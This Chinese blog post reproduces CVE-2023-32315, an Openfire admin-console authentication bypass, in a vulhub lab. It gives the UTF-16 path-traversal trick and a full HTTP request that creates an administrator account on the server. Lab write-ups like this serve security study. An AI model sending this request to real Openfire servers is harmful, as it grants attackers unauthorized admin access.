Openfire管理后台认证绕过漏洞(CVE-2023-32315)vulhub复现

最新推荐文章于 2024-04-27 16:16:22 发布
最新推荐文章于 2024-04-27 16:16:22 发布
阅读量1.2k 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53003652/article/details/131657652
版权

Openfire 是根据开放源 Apache 许可获得许可的实时协作(RTC)服务器。在Openfire版本4.7.4和4.6.7及以前,Openfire的Web管理后台存在一处目录穿越漏洞,这将允许攻击者绕过权限校验访问所有受限页面。

1.漏洞复现

cd vulhub

cd openfire

docker-compose build #重新编译靶场环境
docker-compose up -d #开启靶场
docker-compose ps #查看端口

docker-compose down #关闭靶场

十多年前,Openfire管理后台中曾被发现一处路径穿越漏洞,CVE-2008-6508。攻击者可以利用/setup/setup-/../../[page].jsp来绕过权限校验并访问任意后台页面。从那以后,Openfire增加了对于路径穿越问题的防护策略,用以抵御这个漏洞。但是因为后来内置的Web服务器的升级,引入了对UTF-16字符支持的非标准URL,而前面的防护策略并没有考虑到这一点。

现在使用UTF-16绕过该防护

/setup/setup-/%u002e%u002e/%u002e%u002e/[page].jsp

访问192.168.126.128:9090即可跳转到登录页面

在这里插入图片描述

抓包,发送如下数据包

GET /setup/setup-/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=csrftoken&username=hack&name=&email=&password=hack&passwordConfirm=hack&isadmin=on&create=Create+User HTTP/1.1 Host: localhost:9090 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36 Connection: close Cache-Control: max-age=0 Cookie: csrf=csrftoken

在这里插入图片描述

虽然这个请求的响应包中包含异常,但实际上新用户已经被创建,账号密码均为hack

直接使用创建的新用户登录后台

在这里插入图片描述

芝士土包鼠
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CVE-2023-32315Openfire管理控制台身份验证绕过到RCE的复现
薛定谔嘚喵博客
09-01 1520
在 4.7.4 和 4.6.7 之前的版本中,发现 Openfire管理控制台(管理控制台)是一个基于 Web 的应用程序,容易受到通过设置环境进行的路径遍历攻击。这允许未经身份验证的用户在已配置的 Openfire 环境中使用未经身份验证的 Openfire 设置环境来访问为管理用户保留的 Openfire 管理控制台中的受限页面。
Openfire身份认证绕过漏洞复现+利用(CVE-2023-32315)
0xSec
06-15 8795
Openfire管理控制台是一个基于 Web 的应用程序,被发现可以使用路径遍历的方式绕过权限校验。成功利用后,未经身份验证的用户可以访问 Openfire 管理控制台中的后台页面。同时由于Openfire管理控制台的后台提供了安装插件的功能,所以攻击者可以通过安装恶意插件达成远程代码执行的效果。
漏洞复现学习:openfire鉴权绕过漏洞复现CVE-2024-32315)_openfireadministrationconsole
最新发布
2401_84281712的博客
04-27 869
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
漏洞深度分析 | CVE-2023-36053-Django 表达式拒绝服务
LJQClqjc的博客
07-10 1281
当这个输入被URLValidator处理时,由于正则表达式的处理时间与输入的长度呈指数关系,所以可能会导致处理时间过长实现导致服务拒绝。它由经验丰富的开发人员构建,解决了 Web 开发的大部分麻烦,因此您可以专注于编写应用程序,而无需重新发明轮子。这是因为正则表达式的处理时间与输入的长度呈指数关系,如果输入的长度非常大会导致处理时间过长,实现DoS。在URLValidator中,增加了一个max_length属性,其值为2048,用于限制URL的最大长度。如果URL的长度超过这个值,将会抛出一个验证错误。
Goby 漏洞发布|Ignite Realtime Openfire 权限绕过漏洞CVE-2023-32315
m0_46699477的博客
06-21 729
maxView Storage Manager 是一款企业存储和通信解决方案的管理系统。maxView Storage Manager 存在代码执行漏洞,攻击者可通过 dynamiccontent.properties.xhtml 执行任意代码获取服务器权限。maxView Storage Manager 存在代码执行漏洞,攻击者可通过 dynamiccontent.properties.xhtml 执行任意代码获取服务器权限。
漏洞分析 | Ignite Realtime Openfire 路径遍历漏洞(CVE-2023-32315)
WangsuSecurity的博客
08-25 515
Openfire存在认证绕过漏洞,未经身份认证的远程攻击者可以构造恶意请求访问受限界面,最终上传恶意文件实现远程代码执行。
Error系列-CVE CIS-2023系统漏洞处理方案集合
tangdou369098655的博客
06-06 6254
网络安全-CVE - CIS 漏洞分析以及解决
每日一漏洞CVE-2023-32315
jjjj1029056414的博客
07-09 487
openfire路径穿越漏洞
CVE-2023-32315-Openfire-Bypass-main.zip
07-17
CVE-2023-32315 是一个认证绕过漏洞,允许未经授权的攻击者在没有正确凭证的情况下访问受保护的系统资源。这种类型的漏洞通常源于身份验证机制的弱点,使得攻击者能够绕过系统的安全控制。在 Openfire 的情况下,...
openfire-4.3.0-1.x86_64
01-13
openfire-4.3.0-1.x86_64.rpm, 为CentOS 安装 提供,开发即时消息使用
openfire-restAPI-plugin:允许通过RESTful API进行Openfire管理
02-11
该插件的功能对于需要在Openfire管理控制台之外管理Openfire的应用程序很有用。功能清单获取所有或特定用户的概述,并创建,更新或删除用户获取所有或特定组的概述,并创建,更新或删除组概述所有用户名册条目,并...
jwchat-1.0beta3.rar_ajax jabber_jwchat_jwchat-1.0_openfire
09-22
3. **认证设置**:在JWChat中设置Openfire服务器的域名、端口以及认证方式。 4. **测试连接**:确保JWChat能成功连接到Openfire,并能进行用户注册和登录。 在压缩包文件中,"www.pudn.com.txt"可能是下载来源的...
漏洞复现学习:openfire鉴权绕过漏洞复现CVE-2024-32315)_openfireadministrationconsole(1)
m0_59117112的博客
04-16 486
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
【高危】Openfire权限绕过漏洞(POC公开)
murphysec的博客
06-26 782
Openfire是Java开发且基于XMPP(前称Jabber,即时通讯协议)的开源实时协作(RTC)服务器。在受影响版本中,由于路径验证机制存在缺陷,攻击者可以通过/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp形式的URL绕过访问控制,未授权访问后台页面,并进一步利用安装插件功能远程执行任意代码。
com.squareup.okhttp3:okhttp 组件安全漏洞及健康度分析
OSCS开源安全社区
08-30 1085
墨知是国内首个专注软件供应链安全领域的技术社区,社区致力于为国内数百万技术人员提供全方位的软件供应链安全专业知识内容,包括软件供应链安全技术、漏洞情报、开源组件安全、SBOM、软件成分分析(SCA)、开源许可证合规等前沿技术及最佳实践。
Openfire漏洞CVE-2019-18393/18394)
公众号shadow sock7
08-05 5339
77@ubuntu129:~/repos$ wget https://github.com/igniterealtime/Openfire/releases/download/v4.4.2/openfire_4.4.2_all.deb 77@ubuntu129:~/repos$ sudo dpkg -i openfire_4.4.2_all.deb Selecting previously unselected package openfire. (Reading database ... 332004
【1day】复现Openfire 权限绕过漏洞CVE-2023-32315
记录并分享学习安全的知识点..
07-17 452
Openfire是免费的、开源的、基于可拓展通讯和表示协议(XMPP)、采用Java编程语言开发的实时协作服务器。 Openfire安装和使用都非常简单,并利用Web进行管理。单台服务器甚至可支持上万并发用户。由于Openfire的路径名限制不恰当,未经身份认证的远程攻击者可以构造恶意请求利用该漏洞,成功利用此漏洞可以绕过身份认证登录管理界面。
CVE-2023-32315
09-08
CVE-2023-32315是Ignite Realtime Openfire的权限绕过漏洞。这个漏洞允许攻击者绕过Openfire的身份认证机制,获取未经授权的访问权限。漏洞的CVSS评分为9.8,表示其严重性很高。 关于CVE-2023-32315的详细信息以及漏洞利用插件,你可以通过Goby社区版进行下载和查看。Goby是一款漏洞扫描和管理工具,你可以使用它来获取更多关于该漏洞的信息以及其他漏洞的历史合集。你还可以关注Goby的公众号获取最新的动态消息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芝士土包鼠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值